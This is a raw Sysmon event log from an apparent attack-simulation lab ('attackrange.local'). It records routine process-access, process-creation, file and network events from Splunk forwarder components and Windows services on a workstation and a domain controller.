07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.472{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC62899380E2703F66BD2F00EB2AD35,SHA256=BF5086BD0307C7109271B11BB0AECE36AEC3ABDD5440E660850CB0874E23076D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:28.690{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67F752B94210F80E6B339745C5F88A9,SHA256=D86127C7E9B97914D3FBD1872367D1A13C4611BD592E3D53588B4A52798C53A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.331{0C1E0330-F5AC-60EB-9579-00000000D001}2448928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.144{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:18.732{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51085-false10.0.1.12-8000- 23542300x80000000000000001050412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:29.709{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2480E1FAFEBA6734BF69F5C5B974E8C9,SHA256=BAE6E5FBA8AAD41EFD0EB6815858B856CE63AE2EB1357D146D5DEC93AE62AF45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9282D17BC67512D9C265E41FAB7C37,SHA256=481BC2C1E315748DB3C0DE27E8DB11181896915912E5CC1340C90487F875C13E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F945B340F71B8C058DCE02A63120334A,SHA256=836140FC0B736ED523525E9DB1D507B0DA7A56E5920898BE24F0A5E0BA61047E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:30.956{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2479304D5E3C75A24537A94556817B9D,SHA256=45D6181768608EC77587AEBAE05E3483ECDA51918C485EAA651668F79446455A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:30.724{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4E4EE040495334A997345815BEC54A,SHA256=E322234A96C07D9E769368038A1E7EC2416E457F12D3D11F98577693E267A2BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:29.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57320-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:30.128{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B3BA1D26A7004439F6116F0E85CA0A50,SHA256=53EB2EAF6C6C3716CD6F8B9D9055D328D0C9E057A843F7C5AE0D619209FA51C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:31.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA8737F0F0BF7B0C2EE4ABB7D7DC1770,SHA256=EE083DEF88E7EC44F893AF340F29244A1327B32CDF485D09A2ED642FC2C52C7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:31.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3715324644267AF4821933286E9EE0CE,SHA256=E7B34A6AE046494B400D0676E7D7573AC4D5FD8DAA500D1843BD97F08F6A52DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:32.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E46C567A86AE5D5A29499EDA5A12A990,SHA256=9177EF7BA7B5BBD477D2CE1DAF54B5FC1616A918BFE214E7DD05C91A01112ACD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:24.527{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse184.105.247.196scan-15.shadowserver.org40306-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 